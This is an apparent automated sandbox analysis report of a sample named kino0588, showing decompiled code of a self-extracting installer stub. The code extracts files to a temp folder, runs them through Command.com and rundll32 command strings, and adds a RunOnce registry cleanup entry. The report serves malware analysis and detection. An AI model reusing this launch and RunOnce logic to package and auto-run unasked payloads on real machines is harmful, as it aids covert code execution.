								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E00B8171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00B81A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00B81A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E00B844B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0xb89120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xb81140, _t156, 8,  &_v268) == 0) {
										 *0xb89a34 =  *0xb89a34 & 0xfffffffb;
										if( *0xb89a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E00B8171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0xb89a34 =  *0xb89a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00B81680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00B81680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00B86CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}

0x00b81af3
0x00b81afa
0x00b81b07
0x00b81b09
0x00b81b1a
0x00b81b20
0x00b81b2c
0x00b81b3b
0x00b81b40
0x00b81b2e
0x00b81b2e
0x00b81b33
0x00b81b33
0x00b81b46
0x00b81b4c
0x00b81b52
0x00b81b57
0x00b81b5d
0x00b81b61
0x00b81b9f
0x00b81b9f
0x00b81bb1
0x00b81bc2
0x00000000
0x00b81b63
0x00b81b63
0x00b81b65
0x00b81b68
0x00b81b68
0x00b81b6a
0x00b81b6b
0x00b81b6f
0x00b81b74
0x00000000
0x00000000
0x00b81b76
0x00b81b7b
0x00b81b86
0x00000000
0x00000000
0x00000000
0x00000000
0x00b81b8c
0x00b81b8c
0x00b81b98
0x00b81bc7
0x00b81bc9
0x00b81bcc
0x00b81bd3
0x00b81d75
0x00b81d76
0x00b81d78
0x00b81d7f
0x00b81e05
0x00b81e09
0x00000000
0x00000000
0x00b81e12
0x00b81e1b
0x00b81e73
0x00b81e21
0x00b81e21
0x00b81e28
0x00b81e37
0x00b81e3e
0x00b81e52
0x00b81e60
0x00b81e60
0x00b81e3e
0x00b81e79
0x00b81e7b
0x00b81e84
0x00000000
0x00b81d9b
0x00b81d9b
0x00b81da0
0x00b81da2
0x00b81da5
0x00b81da5
0x00b81da7
0x00b81da8
0x00b81dac
0x00b81dae
0x00b81db4
0x00b81db7
0x00b81db7
0x00b81db9
0x00b81dba
0x00b81dbe
0x00b81dc3
0x00b81dce
0x00b81dd2
0x00b81deb
0x00000000
0x00b81df0
0x00000000
0x00b81dd2
0x00b81bf7
0x00b81bfe
0x00b81c07
0x00b81d55
0x00b81d5a
0x00b81d5b
0x00b81d5d
0x00b81d5e
0x00000000
0x00b81c1b
0x00b81c1b
0x00b81c20
0x00b81c2c
0x00b81c33
0x00b81c38
0x00b81c3a
0x00b81c3a
0x00b81c40
0x00b81c4b
0x00b81c4b
0x00b81c5d
0x00b81c61
0x00b81dd4
0x00b81dd4
0x00b81dd6
0x00b81ddb
0x00b81ddc
0x00b81dde
0x00b81d64
0x00b81d64
0x00b81d67
0x00b81d6c
0x00000000
0x00b81c67
0x00b81c67
0x00b81c6d
0x00b81c72
0x00b81c74
0x00b81c74
0x00b81c8e
0x00b81c99
0x00b81cc0
0x00b81cf8
0x00b81d07
0x00b81d23
0x00b81d09
0x00b81d14
0x00b81d1b
0x00b81d1b
0x00b81d2b
0x00b81d2d
0x00b81d2d
0x00b81d38
0x00b81d39
0x00b81d46
0x00b81cc2
0x00b81cc2
0x00b81ccc
0x00b81cce
0x00b81cce
0x00b81cdb
0x00b81ce6
0x00b81cee
0x00b81cee
0x00b81e89
0x00b81e91
0x00b81e92
0x00b81e94
0x00b81e97
0x00b81ea4
0x00b81ea4
0x00b81c61
0x00b81c07
0x00b81bd3
0x00b81b7b

APIs

CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00B81BE7
GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00B81BFE
LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00B81C57
GetPrivateProfileIntA.KERNEL32 ref: 00B81C88
GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00B81140,00000000,00000008,?), ref: 00B81CB8
GetShortPathNameA.KERNEL32 ref: 00B81D1B

Part of subcall function 00B844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00B84518
Part of subcall function 00B844B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00B84554

Strings

", xrefs: 00B81B25
setupx.dll, xrefs: 00B81D14
AdvancedINF, xrefs: 00B81CAE
Version, xrefs: 00B81CB3
rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 00B81D3B
.BAT, xrefs: 00B81D83
setupapi.dll, xrefs: 00B81D23, 00B81D3A
Reboot, xrefs: 00B81C82
DefaultInstall, xrefs: 00B81C74, 00B81C87, 00B81CCE, 00B81CD3, 00B81D2D, 00B81D39
.INF, xrefs: 00B81BDB
Command.com /c %s, xrefs: 00B81D9B, 00B81DE8
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00B81BA0

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-2247772235
Opcode ID: f67b86c93c8743976ed571e64f7e08139c765030fdb199e582526372583e2af7
Instruction ID: c8ad42c617917a199900d47aa48e7630d2c8a7adccc02e0e20642b5f8a9e5086
Opcode Fuzzy Hash: f67b86c93c8743976ed571e64f7e08139c765030fdb199e582526372583e2af7
Instruction Fuzzy Hash: 70A13771A02204ABEB20BB2CCC44BEA77EDDB45710F144AE5E555A32F1EBB09D87CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B82F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00B82F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0xb88004; // 0xfbc33aab
				_v8 = _t9 ^ _t46;
				if( *0xb88a38 != 0) {
					L5:
					_t11 = E00B85164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E00B86CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E00B855A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E00B8658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0xb8a288("C:\Users\jones\AppData\Local\Temp\IXP003.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0xb88a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP003.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0xb88a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0xb88d48 & 0x000000c0;
									if(( *0xb88d48 & 0x000000c0) == 0) {
										_t41 =  *0xb89a40; // 0x3, executed
										_t26 = E00B8256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0xb88a24; // 0x0
									 *0xb89a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0xb88a38;
										if( *0xb88a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E00B84169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0xb89a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E00B83BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0xb88a24; // 0x0
										goto L26;
									}
								}
								_t27 = E00B83B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E00B844B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0xb89124 = E00B86285();
							goto L16;
						}
						_t59 =  *0xb89a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E00B8621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0xb88a24;
				if( *0xb88a24 != 0) {
					L4:
					_t34 = E00B83A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E00B851E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0xb88a38;
				if( *0xb88a38 != 0) {
					goto L5;
				}
				goto L4;
			}

0x00b82f1d
0x00b82f28
0x00b82f2f
0x00b82f3d
0x00b82f6c
0x00b82f6c
0x00b82f71
0x00b82f73
0x00b83041
0x00b83041
0x00b83043
0x00b83053
0x00b83053
0x00b82f79
0x00b82f80
0x00000000
0x00b82f86
0x00b82f86
0x00b82f93
0x00b82f9e
0x00b82fa0
0x00b82fa6
0x00b82fb8
0x00b82fba
0x00b82fbe
0x00b82fc6
0x00b82fcc
0x00b82fd4
0x00b82fd6
0x00b82fd8
0x00b82fe0
0x00b82fe6
0x00b82fee
0x00b82ff0
0x00b82ff5
0x00b82ff5
0x00b82fee
0x00b82fd4
0x00b82ff8
0x00b82ffe
0x00b83004
0x00b83017
0x00b8301c
0x00b83024
0x00b83054
0x00b8305a
0x00b83065
0x00b83065
0x00b8306c
0x00b8306e
0x00b83075
0x00b8307a
0x00b8307a
0x00b8307c
0x00b83081
0x00b83087
0x00b83089
0x00b830a1
0x00b830a1
0x00b830a9
0x00b830ab
0x00b830ad
0x00b830af
0x00b830af
0x00b830ad
0x00b830b6
0x00000000
0x00b8308b
0x00b8308b
0x00b83091
0x00000000
0x00000000
0x00b83093
0x00b83098
0x00b8309a
0x00000000
0x00000000
0x00b8309c
0x00000000
0x00b8309c
0x00b83089
0x00b8305c
0x00b83061
0x00b83063
0x00000000
0x00000000
0x00000000
0x00b83063
0x00b8302b
0x00b83032
0x00b8303c
0x00000000
0x00b8303c
0x00b83006
0x00b8300c
0x00000000
0x00000000
0x00b8300e
0x00b83015
0x00000000
0x00000000
0x00000000
0x00b83015
0x00b82f80
0x00b82f3f
0x00b82f46
0x00b82f5f
0x00b82f5f
0x00b82f64
0x00b82f66
0x00000000
0x00000000
0x00000000
0x00b82f66
0x00b82f4f
0x00000000
0x00000000
0x00b82f55
0x00b82f5d
0x00000000
0x00000000
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 00B82F93
LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00B82FB2
GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00B82FC6
DecryptFileA.ADVAPI32 ref: 00B82FE6
FreeLibrary.KERNEL32(00000000), ref: 00B82FF8
SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00B8301C

Part of subcall function 00B851E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00B82F4D,?,00000002,00000000), ref: 00B85201

Strings

DecryptFileA, xrefs: 00B82FC0
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00B82FDB, 00B83017
advapi32.dll, xrefs: 00B82F99

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DecryptFileA$advapi32.dll
API String ID: 2126469477-2364573593
Opcode ID: 75f2d76377343e3d4bdec549c2c12727bae1d89584ee851a7ab29f51d7d22903
Instruction ID: b987d2a07c3e726762587b6f84769a7c5c32bc6ee21c44109623df2eaf9f5535
Opcode Fuzzy Hash: 75f2d76377343e3d4bdec549c2c12727bae1d89584ee851a7ab29f51d7d22903
Instruction Fuzzy Hash: B1419F31A002069BDB34BB75AD89B6A33E8EB54F55F0405E6E941D71B1EF74CE80CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B82390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00B82390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0xb88004; // 0xfbc33aab
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E00B86CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E00B81680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E00B816B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E00B81680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E00B816B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E00B816B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E00B8658A( &_v280, 0x104, 0xb81140);
								E00B82390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}

0x00b82398
0x00b8239e
0x00b823a3
0x00b823a5
0x00b823ae
0x00b823b3
0x00b824cb
0x00b824d2
0x00b824d3
0x00b824d4
0x00b824df
0x00b823c2
0x00b823d1
0x00b823db
0x00b823e4
0x00b823f6
0x00b823fc
0x00b82401
0x00000000
0x00000000
0x00000000
0x00000000
0x00b82407
0x00b82407
0x00b82408
0x00b82411
0x00b8241f
0x00b8247a
0x00b82483
0x00b82495
0x00b824a3
0x00b82421
0x00b8242f
0x00b82453
0x00b8245d
0x00b82466
0x00b82472
0x00b82472
0x00b8242f
0x00b824af
0x00b824b5
0x00b824be
0x00b824c5
0x00000000
0x00b824c5

APIs

FindFirstFileA.KERNELBASE(?,00B88A3A,00B811F4,00B88A3A,00000000,?,?), ref: 00B823F6
lstrcmpA.KERNEL32(?,00B811F8), ref: 00B82427
lstrcmpA.KERNEL32(?,00B811FC), ref: 00B8243B
SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00B82495
DeleteFileA.KERNEL32(?), ref: 00B824A3
FindNextFileA.KERNELBASE(00000000,00000010), ref: 00B824AF
FindClose.KERNELBASE(00000000), ref: 00B824BE
RemoveDirectoryA.KERNELBASE(00B88A3A), ref: 00B824C5

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: 65705d987c980e02c068027277f5a64a4c68c70cc406df1e55d163ffe1365c92
Instruction ID: d245fd8b2ce47247324974836edd0cb0d1b6ef3fa6ec0a276874fb08239163d4
Opcode Fuzzy Hash: 65705d987c980e02c068027277f5a64a4c68c70cc406df1e55d163ffe1365c92
Instruction Fuzzy Hash: F73182316056409BD320FBA8CC89AEB73ECEB85305F04496EA695872B0EF349909C762

Uniqueness

Uniqueness Score: -1.00%

Function 00B82BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00B82BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0xb8a288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0xb89124 = 0;
				if(E00B82CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E00B82F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E00B852B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0xb88a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0xb89a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E00B81F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0xb88588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xb89124; // 0x0
				return _t7;
			}

0x00b82c03
0x00b82c0d
0x00b82c18
0x00b82c20
0x00b82c2e
0x00b82c32
0x00b82c36
0x00b82c3d
0x00b82c43
0x00b82c45
0x00b82c47
0x00b82c49
0x00b82c4e
0x00b82c4e
0x00b82c47
0x00b82c32
0x00b82c20
0x00b82c50
0x00b82c54
0x00b82c57
0x00b82c64
0x00b82c66
0x00b82c6b
0x00b82c6d
0x00b82c74
0x00b82c76
0x00b82c7c
0x00b82c7e
0x00b82c87
0x00b82c89
0x00b82c89
0x00b82c87
0x00b82c7c
0x00b82c74
0x00b82c8e
0x00b82c95
0x00b82c98
0x00b82c98
0x00b82c9e
0x00b82ca7

APIs

GetVersion.KERNEL32(?,00000002,00000000,?,00B86BB0,00B80000,00000000,00000002,0000000A), ref: 00B82C03
GetModuleHandleW.KERNEL32(Kernel32.dll,?,00B86BB0,00B80000,00000000,00000002,0000000A), ref: 00B82C18
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00B82C28
CloseHandle.KERNEL32(00000000,?,?,00B86BB0,00B80000,00000000,00000002,0000000A), ref: 00B82C98

Strings

Kernel32.dll, xrefs: 00B82C13
HeapSetInformation, xrefs: 00B82C22

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Handle$AddressCloseModuleProcVersion
String ID: HeapSetInformation$Kernel32.dll
API String ID: 62482547-3460614246
Opcode ID: 152d157ac772dac5b868eca2700748c994e949383fec61beb5b216ff13329ace
Instruction ID: 6126db3569d2cafbf8bb0ef4a7ef189e38c3e9f7f1f70b2fc61d5b07f5868ef0
Opcode Fuzzy Hash: 152d157ac772dac5b868eca2700748c994e949383fec61beb5b216ff13329ace
Instruction Fuzzy Hash: 37118271200206ABEB207FB5AD89A7F37D9EB84790B480496F945E32B1DE31DC42CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B86F40 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B86F40() {

				SetUnhandledExceptionFilter(E00B86EF0); // executed
				return 0;
			}

0x00b86f45
0x00b86f4d

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00B86F45

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 14cc875c4b57d342e1e19661b8feb9f1d20b77087fab408b9eb6b7acc71fa53e
Instruction ID: 1cb9334fb5dea5bd6611295928014f538342b4ba79caf7489e01e726e97534c8
Opcode Fuzzy Hash: 14cc875c4b57d342e1e19661b8feb9f1d20b77087fab408b9eb6b7acc71fa53e
Instruction Fuzzy Hash: ED90027425110087A6103B70DD1D41576D15A4E603F8154E1A211D54B8DF605040D712

Uniqueness

Uniqueness Score: -1.00%

Function 00B8202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00B8202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0xb88004; // 0xfbc33aab
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E00B86CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E00B8171E("wextract_cleanup3", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup3", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E00B8658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0xb89a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0xb891e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0xb891e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xb891e5);
						if(_t90 != 0) {
							 *0xb88580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\jones\AppData\Local\Temp\IXP003.TMP\");
							E00B8171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup3", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E00B844B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E00B8658A( &_v268, 0x104, 0xb81140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
